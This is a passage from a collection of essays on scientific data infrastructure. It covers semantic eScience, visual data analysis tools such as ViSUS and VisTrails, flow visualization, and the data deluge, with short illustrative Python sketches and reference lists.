[13] D. De Roure, C. Goble, and R. Stevens, The Design and Realisation of the myExperiment Virtual Research Environment for Social Sharing of Workflows, Future Gen. Comput. Syst., vol. 25, pp. 561–567, 2009, doi: 10.1016/j.future.2008.06.010.
[14] Y. Gil, E. Deelman, M. Ellisman, T. Fahringer, G. Fox, D. Gannon, C. Goble, M. Livny, L. Moreau, and J. Myers, Examining the Challenges of Scientific Workflows, Computer, vol. 40, pp. 24–32, 2007, doi: 10.1109/MC.2007.421.
[15] G. Bell, T. Hey, and A. Szalay, Beyond the Data Deluge, Science, vol. 323, no. 5919, pp. 1297–1298, Mar. 6, 2009, doi: 10.1126/science.1170411.
[16] G. Erbach, Data-centric view in e-Science information systems, Data Sci. J., vol. 5, pp. 219–222, 2006, doi: 10.2481/dsj.5.219.

SCIENTIFIC INFRASTRUCTURE

Yet traditional data technologies were not designed for the scale and heterogeneity of data in the modern world. Projects such as the Large Hadron Collider (LHC) and the Australian Square Kilometre Array Pathfinder (ASKAP) will generate petabytes of data that must be analyzed by hundreds of scientists working in multiple countries and speaking many different languages. The digital or electronic facilitation of science, or eScience [1], is now essential and becoming widespread. Clearly, data-intensive science, one component of eScience, must move beyond data warehouses and closed systems, striving instead to allow access to data to those outside the main project teams, allow for greater integration of sources, and provide interfaces to those who are expert scientists but not experts in data administration and computation. As eScience flourishes and the barriers to free and open access to data are being lowered, other, more challenging, questions are emerging, such as, "How do I use this data that I did not generate?" or "How do I use this data type, which I have never seen, with the data I use every day?" or "What should I do if I really need data from another discipline but I cannot understand its terms?"
This list of questions is large and growing as data and information product use increases and as more of science comes to rely on specialized devices. 147 An important insight into dealing with heterogeneous data is that if you know what the data means, it will be easier to use. As the volume, complexity, and heterogeneity of data resources grow, scientists increasingly need new capabilities that rely on new semantic approaches (e.g., in the form of ontologiesmachine encodings of terms, concepts, and relations among them). Semantic technologies are gaining momentum in eScience areas such as solar-terrestrial physics (see Figure 1), ecology,1 ocean and marine sciences,2 healthcare, and life sciences,3 to name but a few. The developers of eScience infrastructures are increasingly in need of semantic-based methodologies, tools, and middleware. They can in turn facilitate scientific knowledge modeling, logic-based hypothesis checking, semantic data integration, application composition, and integrated knowledge discovery and data analysis for different scientific domains and systems noted above, for use by scientists, students, and, increasingly, non-experts. The influence of the artificial intelligence community and the increasing amount of data available on the Web (which has led many scientists to use the Web as their primary computer) have led semantic Web researchers to focus both on formal aspects of semantic representation languages and on general-purpose semantic application development. Languages are being standardized, and communities are in turn using those languages to build and use ontologiesspecifications of concepts and terms and the relations between them (in the formal, machine-readable sense). All of the capabilities currently needed by eScienceincluding data integration, fusion, and mining; workflow development, orchestration, and execution; capture of provenance, lineage, and data quality; validation, verification, and trust of data authenticity; and fitness for purposeneed semantic representation and mediation if eScience is to become fully data-intensive. The need for more semantics in eScience also arises in part from the increasingly distributed and interdisciplinary challenges of modern research. For example, the availability of high spatial-resolution remote sensing data (such as imagery) from satellites for ecosystem science is simultaneously changing the nature of research in other scientific fields, such as environmental science. Yet ground-truthing with in situ data creates an immediate data-integration challenge. Questions that arise for researchers who use such data include, How can point data be reconciled with various satellite datae.g., swath or griddedproducts? How is the spatial 1 E.g., the Science Environment for Ecological Knowledge (SEEK) and [2]. E.g., the Marine Metadata Interoperability (MMI) project. 3 E.g., the Semantic Web Health Care and Life Sciences (HCLS) Interest Group and [3]. 2 148 SCIENTIFIC INFRASTRUCTURE Figure 1. The Virtual Solar-Terrestrial Observatory (VSTO) provides data integration between physical parameters measured by different instruments. VSTO also mediates independent coordinate information to select appropriate plotting types using a semantic eScience approach without the user having to know the underlying representations and structure of the data [4, 5]. registration performed? Do these data represent the same thing, at the same vertical (as well as geographic) position or at the same time, and does that matter? 
Another scientist, such as a biologist, might need to access the same data from a very different perspective, to ask questions such as, I found this particular species in an unexpected location. What are the geophysical parameterstemperature, humidity, and so onfor this area, and how has it changed over the last weeks, months, years? Answers to such questions reside in both the metadata and the data itself. Perhaps more important is the fact that data and information products are increasingly being made available via Web services, so the semantic binding (i.e., the meaning) we seek must shift from being at the data level to being at the Internet/Web service level. Semantics adds not only well-defined and machine-encoded definitions of vo- 149 cabularies, concepts, and terms, but it also explains the interrelationships among them (and especially, on the Web, among different vocabularies residing in different documents or repositories) in declarative (stated) and conditional (e.g., rulebased or logic) forms. One of the present challenges around semantic eScience is balancing expressivity (of the semantic representation) with the complexity of defining terms used by scientific experts and implementing the resulting systems. This balance is application dependent, which means there is no one-approach-fitsall solution. In turn, this implies that a peer relationship is required between physical scientists and computer scientists, and between software engineers and data managers and data providers. The last few years have seen significant development in Web-based (i.e., XML) markup languages, including stabilization and standardization. Retrospective data and their accompanying catalogs are now provided as Web services, and real-time and near-real-time data are becoming standardized as sensor Web services are emerging. This means that diverse datasets are now widely available. Clearinghouses for such service registries, including the Earth Observing System Clearinghouse (ECHO) and the Global Earth Observation System of Systems (GEOSS) for Earth science, are becoming populated, and these complement comprehensive inventory catalogs such as NASAs Global Change Master Directory (GCMD). However, these registries remain largely limited to syntax-only representations of the services and underlying data. Intensive human effortto match inputs, outputs, and preconditions as well as the meaning of methods for the servicesis required to utilize them. Project and community work to develop data models to improve lower-level interoperability is also increasing. These models expose domain vocabularies, which is helpful for immediate domains of interest but not necessarily for crosscutting areas such as Earth science data records and collections. As noted in reports from the international level to the agency level, data from new missions, together with data from existing agency sources, are increasingly being used synergistically with other observing and modeling sources. As these data sources are made available as services, the need for interoperability among differing vocabularies, services, and method representations remains, and the limitations of syntax-only (or lightweight semantics, such as coverage) become clear. Further, as demand for information products (representations of the data beyond pure science use) increases, the need for non-specialist access to information services based on science data is rapidly increasing. This need is not being met in most application areas. 
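To make the idea of machine-readable vocabularies and declared relationships concrete, the sketch below uses the open source Python library rdflib to annotate a fictitious dataset-as-a-service with terms from two invented vocabularies and to state, declaratively, how a local term relates to a term defined elsewhere. The namespaces, resource names, and properties are all assumptions made up for illustration; only the rdflib calls themselves are real.

```python
# A small sketch (using the open source rdflib package) of how a dataset exposed
# as a service might be annotated with terms from community vocabularies, so that
# relationships are declared rather than implied. All namespaces and resource
# names below are invented for illustration.

from rdflib import Graph, Literal, Namespace, URIRef
from rdflib.namespace import RDF, RDFS

EX = Namespace("http://example.org/obs/")       # hypothetical observation vocabulary
SVC = Namespace("http://example.org/service/")  # hypothetical service-description terms

g = Graph()
g.bind("ex", EX)
g.bind("svc", SVC)

dataset = URIRef("http://example.org/data/buoy-42")
g.add((dataset, RDF.type, EX.TimeSeriesDataset))
g.add((dataset, RDFS.label, Literal("Sea-surface temperature, buoy 42")))
g.add((dataset, EX.measuresParameter, EX.SeaSurfaceTemperature))
g.add((dataset, EX.hasUnits, Literal("degC")))

# Declare that the local term is related to one in another community's
# vocabulary -- the kind of cross-vocabulary link discussed above.
g.add((EX.SeaSurfaceTemperature, RDFS.seeAlso,
       URIRef("http://example.org/other-vocab/SST")))

# A service-level description: the endpoint and the dataset it serves.
endpoint = URIRef("http://example.org/service/sst-query")
g.add((endpoint, RDF.type, SVC.DataService))
g.add((endpoint, SVC.servesDataset, dataset))

# In rdflib 6 and later, serialize() returns a string.
print(g.serialize(format="turtle"))
```

The point of the sketch is not the particular terms but the fact that the meaning is stated in a declarative, machine-readable form that another service can read, merge, and reason over, rather than being buried in documentation.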
Those involved in extant efforts (noted earlier, such as solar-terrestrial physics, 150 SCIENTIFIC INFRASTRUCTURE ecology, ocean and marine sciences, healthcare, and life sciences) have made the case for interoperability that moves away from reliance on agreements at the dataelement, or syntactic, level toward a higher scientific, or semantic, level. Results from such research projects have demonstrated these types of data integration capabilities in interdisciplinary and cross-instrument measurement use. Now that syntax-only interoperability is no longer state-of-the-art, the next logical step is to use the semantics to begin to enable a similar level of semantic support at the dataas-a-service level. Despite this increasing awareness of the importance of semantics to dataintensive eScience, participation from the scientific community to develop the particular requirements from specific science areas has been inadequate. Scientific researchers are growing ever more dependent on the Web for their data needs, but to date they have not yet created a coherent agenda for exploring the emerging trends being enabled by semantic technologies and for interacting with Semantic Web researchers. To help create such an agenda, we need to develop a multi-disciplinary field of semantic eScience that fosters the growth and development of data-intensive scientific applications based on semantic methodologies and technologies, as well as related knowledge-based approaches. To this end, we issue a four-point call to action: Researchers in science must work with colleagues in computer science and informatics to develop field-specific requirements and to implement and evaluate the languages, tools, and applications being developed for semantic eScience. Scientific and professional societies must provide the settings in which the needed rich interplay between science requirements and informatics capabilities can be realized, and they must acknowledge the importance of this work in career advancement via citation-like metrics. Funding agencies must increasingly target the building of communities of practice, with emphasis on the types of interdisciplinary teams of researchers and practitioners that are needed to advance and sustain semantic eScience efforts. All partiesscientists, societies, and fundersmust play a role in creating governance around controlled vocabularies, taxonomies, and ontologies that can be used in scientific applications to ensure the currency and evolution of knowledge encoded in semantics. 151 Although early efforts are under way in all four areas, much more must be done. The very nature of dealing with the increasing complexity of modern science demands it. References [1] T. Hey and A. E. Trefethen, Cyberinfrastructure for e-Science, Science, vol. 308, no. 5723, May 2005, pp. 817821, doi: 10.1126/science.1110410. [2] J. Madin, S. Bowers, M. Schildhauer, S. Krivov, D. Pennington, and F. Villa, An Ontology for Describing and Synthesizing Ecological Observation Data, Ecol. Inf., vol. 2, no. 3, pp. 279296, 2007, doi: 10.1016/j.ecoinf.2007.05.004. [3] E. Neumann, A Life Science Semantic Web: Are We There Yet? Sci. STKE, p. 22, 2005, doi: 10.1126/stke.2832005pe22. [4] P. Fox, D. McGuinness, L. Cinquini, P. West, J. Garcia, and J. Benedict, Ontology-supported scientific data frameworks: The virtual solar-terrestrial observatory experience, Comput. Geosci., vol. 35, no. 4, pp. 724738, 2009, doi: 10.1.1.141.1827. [5] D. McGuinness, P. Fox, L. Cinquini, P. West, J. Garcia, J. L. Benedict, and D. 
Middleton, The Virtual Solar-Terrestrial Observatory: A Deployed Semantic Web Application Case Study for Scientific Research, AI Mag., vol. 29, no. 1, pp. 65–76, 2007, doi: 10.1145/1317353.1317355.

SCIENTIFIC INFRASTRUCTURE
Charles Hansen, Chris R. Johnson, Valerio Pascucci, and Claudio T. Silva, University of Utah

The world has experienced an information big bang: an explosion of data. The amount of information being created is increasing at an exponential rate. Since 2003, digital information has accounted for 90 percent of all information produced [1], vastly exceeding the amount of information on paper and on film. One of the greatest scientific and engineering challenges of the 21st century will be to understand and make effective use of this growing body of information. Visual data analysis, facilitated by interactive interfaces, enables the detection and validation of expected results while also enabling unexpected discoveries in science. It allows for the validation of new theoretical models, provides comparison between models and datasets, enables quantitative and qualitative querying, improves interpretation of data, and facilitates decision making. Scientists can use visual data analysis systems to explore "what if" scenarios, define hypotheses, and examine data using multiple perspectives and assumptions. They can identify connections among large numbers of attributes and quantitatively assess the reliability of hypotheses. In essence, visual data analysis is an integral part of scientific discovery and is far from a solved problem. Many avenues for future research remain open. In this article, we describe visual data analysis topics that will receive attention in the next decade [2, 3].

Figure 1. Interactive visualization of four timesteps (t=0, t=200, t=400, t=700) of the 1152³ simulation of a Rayleigh-Taylor instability. Gravity drives the mixing of a heavy fluid on top of a lighter one across a perturbed interface. Two envelope surfaces capture the mixing region.

In recent years, computational scientists with access to the world's largest supercomputers have successfully simulated a number of natural and man-made phenomena with unprecedented levels of detail. Such simulations routinely produce massive amounts of data. For example, hydrodynamic instability simulations performed at Lawrence Livermore National Laboratory (LLNL) in early 2002 produced several tens of terabytes of data, as shown in Figure 1. This data must be visualized and analyzed to verify and validate the underlying model, understand the phenomenon in detail, and develop new insights into its fundamental physics. Therefore, both visualization and data analysis algorithms require new, advanced designs that enable high performance when dealing with large amounts of data. Data-streaming techniques and out-of-core computing specifically address the issues of algorithm redesign and data layout restructuring, which are necessary to enable scalable processing of massive amounts of data. For example, space-filling curves have been used to develop a static indexing scheme called ViSUS, which produces a data layout that enables the hierarchical traversal of n-dimensional regular grids.
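The following sketch illustrates, in Python, the kind of bit-interleaving that space-filling-curve layouts are built on. It computes a plain Morton (Z-order) index for a 3-D grid sample; it is not the ViSUS hierarchical indexing scheme itself, only a simplified illustration of how a multidimensional grid position can be mapped to a one-dimensional index with a short sequence of bit manipulations.

```python
# A generic Morton (Z-order) index sketch for a 3-D regular grid. This is not the
# ViSUS hierarchical layout, only an illustration of the bit-interleaving that
# space-filling-curve indexing schemes rely on: nearby grid points tend to map to
# nearby positions in the 1-D index, which helps coarse-to-fine, out-of-core access.

def part_bits(v: int, bits: int = 10) -> int:
    """Spread the low `bits` bits of v so there are two zero bits between each."""
    out = 0
    for i in range(bits):
        out |= ((v >> i) & 1) << (3 * i)
    return out


def morton3(x: int, y: int, z: int, bits: int = 10) -> int:
    """Interleave the bits of (x, y, z) into a single Z-order index."""
    return part_bits(x, bits) | (part_bits(y, bits) << 1) | (part_bits(z, bits) << 2)


def demorton3(code: int, bits: int = 10):
    """Invert the interleaving to recover (x, y, z)."""
    x = y = z = 0
    for i in range(bits):
        x |= ((code >> (3 * i)) & 1) << i
        y |= ((code >> (3 * i + 1)) & 1) << i
        z |= ((code >> (3 * i + 2)) & 1) << i
    return x, y, z


if __name__ == "__main__":
    # Two neighboring samples land close together in the 1-D ordering.
    print(morton3(4, 5, 6), morton3(5, 5, 6))   # 482 483
    assert demorton3(morton3(4, 5, 6)) == (4, 5, 6)
```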
Three features make this approach particularly attractive: (1) the order of the data is independent of the parameters of the physical hardware (a cache-oblivious approach), (2) conversion from Z-order used in classical database approaches is achieved using a simple sequence of bit-string manipulations, and (3) it does not introduce any data replication. This approach has 1 154 SCIENTIFIC INFRASTRUCTURE Figure 2. Scalability of the ViSUS infrastructure, which is used for visualization in a variety of applications (such as medical imaging, subsurface modeling, climate modeling, microscopy, satellite imaging, digital photography, and large-scale scientific simulations) and with a wide range of devices (from the iPhone to the powerwall). been used for direct streaming and real-time monitoring of large-scale simulations during execution [4]. Figure 2 shows the ViSUS streaming infrastructure streaming LLNL simulation codes and visualizing them in real time on the Blue Gene/L installation at the Supercomputing 2004 exhibit (where Blue Gene/L was introduced as the new fastest supercomputer in the world). The extreme scalability of this approach allows the use of the same code base for a large set of applications while exploiting a wide range of devices, from large powerwall displays to workstations, laptop computers, and handheld devices such as the iPhone. Generalization of this class of techniques to the case of unstructured meshes remains a major problem. More generally, the fast evolution and growing diversity of hardware pose a major challenge in the design of software infrastructures that are intrinsically scalable and adaptable to a variety of computing resources and running conditions. This poses theoretical and practical questions that future researchers in visualization and analysis for data-intensive applications will need to address. VisTrails: Provenance and Data Exploration Data exploration is an inherently creative process that requires the researcher to locate relevant data, visualize the data and discover relationships, collaborate with 155 peers while exploring solutions, and disseminate results. Given the volume of data and complexity of analyses that are common in scientific exploration, new tools are needed and existing tools should be extended to better support creativity. The ability to systematically capture provenance is a key requirement for these tools. The provenance (also referred to as the audit trail, lineage, or pedigree) of a data product contains information about the process and data used to derive the data product. The importance of keeping provenance for data products is well recognized in the scientific community [5, 6]. It provides important documentation that is key to preserving the data, determining its quality and authorship, and reproducing and validating the results. The availability of provenance also supports reflective reasoning, allowing users to store temporary results, make inferences from stored knowledge, and follow chains of reasoning backward and forward. VisTrails2 is an open source system that we designed to support exploratory computational tasks such as visualization, data mining, and integration. VisTrails provides a comprehensive provenance management infrastructure and can be easily combined with existing tools and libraries. A new concept we introduced with VisTrails is the notion of provenance of workflow evolution [7]. 
In contrast to previous workflow and visualization systems, which maintain provenance only for derived data products, VisTrails treats the workflows (or pipelines) as first-class data items and keeps their provenance. VisTrails is an extensible system. Like workflow systems, it allows pipelines to be created that combine multiple libraries. In addition, the VisTrails provenance infrastructure can be integrated with interactive tools, which cannot be easily wrapped in a workflow system [8]. Figure 3 shows an example of an exploratory visualization using VisTrails. In the center, the visual trail, or vistrail, captures all modifications that users apply to the visualizations. Each node in the vistrail tree corresponds to a pipeline, and the edges between two nodes correspond to changes applied to transform the parent pipeline into the child (e.g., through the addition of a module or a change to a parameter value). The tree-based representation allows a scientist to return to a previous version in an intuitive way, undo bad changes, compare workflows, and be reminded of the actions that led to a particular result. Ad hoc approaches to data exploration, which are widely used in the scientific community, have serious limitations. In particular, scientists and engineers need 2 156 SCIENTIFIC INFRASTRUCTURE Figure 3. An example of an exploratory visualization for studying celestial structures derived from cosmological simulations using VisTrails. Complete provenance of the exploration process is displayed as a vistrail. Detailed metadata are also stored, including free-text notes made by the scientist, the date and time the workflow was created or modified, optional descriptive tags, and the name of the person who created it. to expend substantial effort managing data (e.g., scripts that encode computational tasks, raw data, data products, images, and notes) and need to record provenance so that basic questions can be answered, such as: Who created the data product and when? When was it modified, and by whom? What process was used to create it? Were two data products derived from the same raw data? This process is not only time consuming but error prone. The absence of provenance makes it hard (and sometimes impossible) to reproduce and share results, solve problems collaboratively, validate results with different input data, understand the process used to solve a particular problem, and reuse the knowledge involved in the data analysis process. It also greatly limits the longevity of the data product. Without precise and sufficient information about how it was generated, its value is greatly diminished. Visualization systems aimed at the scientific domain need to provide a flexible 157 Figure 4. Representing provenance as a series of actions that modify a pipeline makes visualizing the differences between two workflows possible. The difference between two workflows is represented in a meaningful way, as an aggregation of the two. This is both informative and intuitive, reducing the time it takes to understand how two workflows are functionally different. framework that not only enables scientists to perform complex analyses over large datasets but also captures detailed provenance of the analysis process. Figure 4 shows ParaView3 (a data analysis and visualization tool for extreme3 158 SCIENTIFIC INFRASTRUCTURE ly large datasets) and the VisTrails Provenance Explorer transparently capturing a complete exploration process. 
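The version-tree idea can be made concrete with a small sketch. The code below is a toy model, not the VisTrails data model or API: each version stores only the action that transforms its parent's pipeline, any pipeline can be rebuilt by replaying actions from the root, and undo is simply a move to the parent node. All module names and parameters are invented.

```python
# A toy model of change-based provenance in the spirit of the vistrail version
# tree described above. Illustrative only; not the VisTrails implementation.

from dataclasses import dataclass
from typing import Callable, Dict, List, Optional


@dataclass
class Version:
    id: int
    parent: Optional[int]
    description: str
    action: Callable[[dict], dict]  # transforms a pipeline specification


class VersionTree:
    def __init__(self):
        self.versions: Dict[int, Version] = {0: Version(0, None, "empty pipeline", lambda p: {})}
        self._next = 1

    def add(self, parent: int, description: str, action: Callable[[dict], dict]) -> int:
        vid = self._next
        self.versions[vid] = Version(vid, parent, description, action)
        self._next += 1
        return vid

    def materialize(self, vid: int) -> dict:
        """Rebuild a pipeline by replaying actions from the root down to `vid`."""
        chain: List[Version] = []
        node: Optional[int] = vid
        while node is not None:
            chain.append(self.versions[node])
            node = self.versions[node].parent
        pipeline: dict = {}
        for version in reversed(chain):
            pipeline = version.action(pipeline)
        return pipeline

    def undo(self, vid: int) -> int:
        """'Undo' is just a move to the parent version; nothing is deleted."""
        parent = self.versions[vid].parent
        return parent if parent is not None else vid


tree = VersionTree()
v1 = tree.add(0, "add reader module", lambda p: {**p, "reader": "volume.vti"})
v2 = tree.add(v1, "add isosurface", lambda p: {**p, "isosurface": 0.5})
v3 = tree.add(v1, "add slice instead", lambda p: {**p, "slice": "z=10"})  # a branch

print(tree.materialize(v2))   # {'reader': 'volume.vti', 'isosurface': 0.5}
print(tree.materialize(v3))   # {'reader': 'volume.vti', 'slice': 'z=10'}
print(tree.undo(v2) == v1)    # True: undo moves up the tree
```

Because only the deltas are stored, the full history of an exploration, including abandoned branches, remains compact and queryable.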
The provenance capture mechanism was implemented by inserting monitoring code in ParaView's undo/redo mechanism, which captures changes to the underlying pipeline specification. Essentially, the action on top of the undo stack is added to the vistrail in the appropriate place, and undo is reinterpreted to mean "move up the version tree." Note that the change-based representation is both simple and compact: it uses substantially less space than the alternative approach of storing multiple instances, or versions, of the state.

Flow Visualization Techniques

A precise qualitative and quantitative assessment of three-dimensional transient flow phenomena is required in a broad range of scientific, engineering, and medical applications. Fortunately, in many cases the analysis of a 3-D vector field can be reduced to the investigation of the two-dimensional structures produced by its interaction with the boundary of the object under consideration. Typical examples of such analysis for fluid flows include airfoils and reactors in aeronautics, engine walls and exhaust pipes in the automotive industry, and rotor blades in turbomachinery. Other applications in biomedicine focus on the interplay between bioelectric fields and the surface of an organ. In each case, numerical simulations of increasing size and sophistication are becoming instrumental in helping scientists and engineers reach a deeper understanding of the flow properties that are relevant to their task. The scientific visualization community has concentrated a significant part of its research efforts on the design of visualization methods that convey local and global structures that occur at various spatial and temporal scales in transient flow simulations. In particular, emphasis has been placed on the interactivity of the corresponding visual analysis, which has been identified as a critical aspect of the effectiveness of the proposed algorithms.

A recent trend in flow visualization research is to use GPUs to compute image space methods to tackle the computational complexity of visualization techniques that support flows defined over curved surfaces. The key feature of this approach is the ability to efficiently produce a dense texture representation of the flow without explicitly computing a surface parameterization. This is achieved by projecting onto the image plane the flow corresponding to the visible part of the surface, allowing subsequent texture generation in the image space through backward integration and iterative blending. Although the use of partial surface parameterization obtained by projection results in an impressive performance gain, texture patterns stretching beyond the visible part of the self-occluded surface become incoherent due to the lack of full surface parameterization. To address this problem, we have introduced a novel scheme that fully supports the creation of high-quality texture-based visualizations of flows defined over arbitrary curved surfaces [9]. Called Flow Charts, our scheme addresses the issue mentioned previously by segmenting the surface into overlapping patches, which are then individually parameterized into charts and packed in the texture domain.

Figure 5. Simulation of a high-speed ICE train. Left: The GPUFLIC result. Middle: Patch configurations. Right: Charts in texture space.
The overlapped region provides each local chart with a smooth representation of its direct vicinity in the flow domain as well as with the inter-chart adjacency information, both of which are required for accurate and non-disrupted particle advection. The vector field and the patch adjacency relation are naturally represented as textures, enabling efficient GPU implementation of state-of-the-art flow texture synthesis algorithms such as GPUFLIC and UFAC. Figure 5 shows the result of a simulation of a high-speed German IntercityExpress (ICE) train traveling at a velocity of about 250 km/h with wind blowing from the side at an incidence angle of 30 degrees. The wind causes vortices to form on the lee side of the train, creating a drop in pressure that adversely affects the trains ability to stay on the track. These flow structures induce separation and attachment flow patterns on the train surface. They can be clearly seen in the proposed images close to the salient edges of the geometry. 160 SCIENTIFIC INFRASTRUCTURE Figure 6. Visualization of the Karman dataset using dye advection. Left column: Physically based dye advection. Middle column: Texture advection method. Right column: Level-set method. The time sequence is from top to bottom. The effectiveness of a physically based formulation can be seen with the Karman dataset (Figure 6), a numerical simulation of the classical Von Krmn vortex street phenomenon, in which a repeating pattern of swirling vortices is caused by the separation of flow passing over a circular-shaped obstacle. The visualization of dye advection is overlaid on dense texture visualization that shows instantaneous flow structures generated by GPUFLIC. The patterns generated by the texture-advection method are hazy due to numerical diffusion and loss of mass. In a level-set method, intricate structures are lost because of the binary dye/background threshold. Thanks to the physically based formulation [10], the visualization is capable of accurately conveying detailed structures not shown using the traditional texture-advection method. Future Data-Intensive Visualization Challenges Fundamental advances in visualization techniques and systems must be made to extract meaning from large and complex datasets derived from experiments and from upcoming petascale and exascale simulation systems. Effective data analysis and visualization tools in support of predictive simulations and scientific knowledge discovery must be based on strong algorithmic and mathematical foundations 161 and must allow scientists to reliably characterize salient features in their data. New mathematical methods in areas such as topology, high-order tensor analysis, and statistics will constitute the core of feature extraction and uncertainty modeling using formal definition of complex shapes, patterns, and space-time distributions. Topological methods are becoming increasingly important in the development of advanced data analysis because of their expressive power in describing complex shapes at multiple scales. The recent introduction of robust combinatorial techniques for topological analysis has enabled the use of topologynot only for presentation of known phenomena but for the detection and quantification of new features of fundamental scientific interest. Our current data-analysis capabilities lag far behind our ability to produce simulation data or record observational data. 
New visual data analysis techniques will need to dynamically consider high-dimensional probability distributions of quantities of interest. This will require new contributions from mathematics, probability, and statistics. The scaling of simulations to ever-finer granularity and timesteps brings new challenges in visualizing the data that is generated. It will be crucial to develop smart, semi-automated visualization algorithms and methodologies to help filter the data or present summary visualizations to enable scientists to begin analyzing the immense datasets using a more top-down methodological path. The ability to fully quantify uncertainty in high-performance computational simulations will provide new capabilities for verification and validation of simulation codes. Hence, uncertainty representation and quantification, uncertainty propagation, and uncertainty visualization techniques need to be developed to provide scientists with credible and verifiable visualizations. New approaches to visual data analysis and knowledge discovery are needed to enable researchers to gain insight into this emerging form of scientific data. Such approaches must take into account the multi-model nature of the data; provide the means for scientists to easily transition views from global to local model data; allow blending of traditional scientific visualization and information visualization; perform hypothesis testing, verification, and validation; and address the challenges posed by the use of vastly different grid types and by the various elements of the multi-model code. Tools that leverage semantic information and hide details of dataset formats will be critical to enabling visualization and analysis experts to concentrate on the design of these approaches rather than becoming mired in the trivialities of particular data representations [11]. 162 SCIENTIFIC INFRASTRUCTURE Acknowledgments Publication is based, in part, on work supported by DOE: VACET, DOE SDM, DOE C-SAFE Alliance Center, the National Science Foundation (grants IIS-0746500, CNS-0751152, IIS-0713637, OCE-0424602, IIS-0534628, CNS-0514485, IIS0513692, CNS-0524096, CCF-0401498, OISE-0405402, CNS-0615194, CNS0551724, CCF-0541113, IIS-0513212, and CCF-0528201), IBM Faculty Awards (2005, 2006, and 2007), NIH NCRR Grant No. 5P41RR012553-10 and Award Number KUS-C1-016-04, made by King Abdullah University of Science and Technology (KAUST). The authors would like to thank Juliana Freire and the VisTrails team for help with the third section of this article. References [1] C. R. Johnson, R. Moorhead, T. Munzner, H. Pfister, P. Rheingans, and T. S. Yoo, Eds., NIH-NSF Visualization Research Challenges Report, IEEE Press, ISBN 0-7695-2733-7, 2006, wpmu/techcom/national-initiatives/nihnsf-visualization-research-challenges-reportjanuary-2006, doi: 10.1109/MCG.2006.44. [2] NSF Blue Ribbon Panel Report on Simulation-Based Engineering Science (J. T. Oden, T. Belytschko, J. Fish, T. Hughes, C. R. Johnson, D. Keyes, A. Laub, L. Petzold, D. Srolovitz, and S. Yip), Simulation-Based Engineering Science, 2006, SBES_Final_Report.pdf. [3] NIH-NSF Visualization Research Challenges,. [4] V. Pascucci, D. E. Laney, R. J. Frank, F. Gygi, G. Scorzelli, L. Linsen, and B. Hamann, Real-time monitoring of large scientific simulations, SAC, pp. 194198, ACM, 2003, doi: 10.1.1.66.9717. [5] S. B. Davidson and J. Freire, Provenance and scientific workflows: challenges and opportunities, Proc. ACM SIGMOD, pp. 13451350, 2008, doi: 10.1.1.140.3264. [6] J. Freire, D. Koop, E. 
Santos, and C. Silva, Provenance for computational tasks: A survey, Comput. Sci. Eng., vol. 10, no. 3, pp. 11–21, 2008, doi: 10.1109/MCSE.2008.79.
[7] J. Freire, C. T. Silva, S. P. Callahan, E. Santos, C. E. Scheidegger, and H. T. Vo, Managing rapidly-evolving scientific workflows, International Provenance and Annotation Workshop (IPAW), LNCS 4145, pp. 10–18, 2006, doi: 10.1.1.117.5530.
[8] C. Silva, J. Freire, and S. P. Callahan, Provenance for visualizations: Reproducibility and beyond, IEEE Comput. Sci. Eng., 2007, doi: 10.1109/MCSE.2007.106.
[9] G.-S. Li, X. Tricoche, D. Weiskopf, and C. Hansen, Flow charts: Visualization of vector fields on arbitrary surfaces, IEEE Trans. Visual. Comput. Graphics, vol. 14, no. 5, pp. 1067–1080, 2008, doi: 10.1109/TVCG.2008.58.
[10] G.-S. Li, C. Hansen, and X. Tricoche, Physically-based dye advection for flow visualization, Comp. Graphics Forum J., vol. 27, no. 3, pp. 727–735, 2008, doi: 10.1111/j.1467-8659.2008.01201.x.
[11] C. R. Johnson, R. Ross, S. Ahern, J. Ahrens, W. Bethel, K. L. Ma, M. Papka, J. van Rosendale, H. W. Shen, and J. Thomas, Visualization and Knowledge Discovery: Report from the DOE/ASCR Workshop on Visual Analysis and Data Exploration at Extreme Scale, 2007.

SCIENTIFIC INFRASTRUCTURE

Computer systems have become a vital part of the modern research environment, supporting all aspects of the research lifecycle [1]. The community uses the terms eScience and eResearch to highlight the important role of computer technology in the ways we undertake research, collaborate, share data and documents, submit funding applications, use devices to automatically and accurately collect data from experiments, deploy new generations of microscopes and telescopes to increase the quality of the acquired imagery, and archive everything along the way for provenance and long-term preservation [2, 3]. However, the same technological advances in data capture, generation, and sharing and the automation enabled by computers have resulted in an unprecedented explosion in data, a situation that applies not only to research but to every aspect of our digital lives. This data deluge, especially in the scientific domain, has brought new research infrastructure challenges, as highlighted by Jim Gray and Alex Szalay [4]. The processing, data transfer, and storage demands are far greater today than just a few years ago. It is no surprise that we are talking about the emergence of a new research methodology, the fourth paradigm, in science.

Through the use of technology and automation, we are trying to keep up with the challenges of the data deluge. The emergence of the Web as an application, data sharing, and collaboration platform has broken many barriers in the way research is undertaken and disseminated. The emerging cloud computing infrastructures (e.g., Amazon's) and the new generation of data-intensive computing platforms (e.g., DISC, Google's MapReduce, Hadoop, and Dryad) are geared toward managing and processing large amounts of data. Amazon is even offering a sneakernet-like service to address the problem of transferring large amounts of data into its cloud. Companies such as Google, Yahoo!, and Microsoft are demonstrating that it is possible to aggregate huge amounts of data from around the Web and store, manage, and index it and then build engaging user experiences around it.
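For readers unfamiliar with the pattern, the sketch below shows the MapReduce idea mentioned above in a few lines of Python. It runs on a single machine over a handful of made-up strings; systems such as Hadoop and Dryad supply what the sketch leaves out entirely, namely partitioning of the data, distribution across many machines, and fault tolerance.

```python
# A minimal, single-machine illustration of the MapReduce pattern that systems
# such as Hadoop implement at scale (with partitioning, distribution, and
# fault tolerance that this sketch omits).

from collections import defaultdict
from typing import Callable, Dict, Iterable, List, Tuple


def map_reduce(records: Iterable[str],
               mapper: Callable[[str], Iterable[Tuple[str, int]]],
               reducer: Callable[[str, List[int]], Tuple[str, int]]) -> Dict[str, int]:
    # Map phase: emit intermediate key/value pairs.
    groups: Dict[str, List[int]] = defaultdict(list)
    for record in records:
        for key, value in mapper(record):
            groups[key].append(value)
    # The grouping dict plays the role of the shuffle; reduce each key.
    return dict(reducer(key, values) for key, values in groups.items())


# Classic word count over a few made-up document snippets.
docs = ["the data deluge", "the fourth paradigm", "data intensive science"]
counts = map_reduce(
    docs,
    mapper=lambda doc: [(word, 1) for word in doc.split()],
    reducer=lambda word, ones: (word, sum(ones)),
)
print(counts)  # e.g., {'the': 2, 'data': 2, ...}
```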
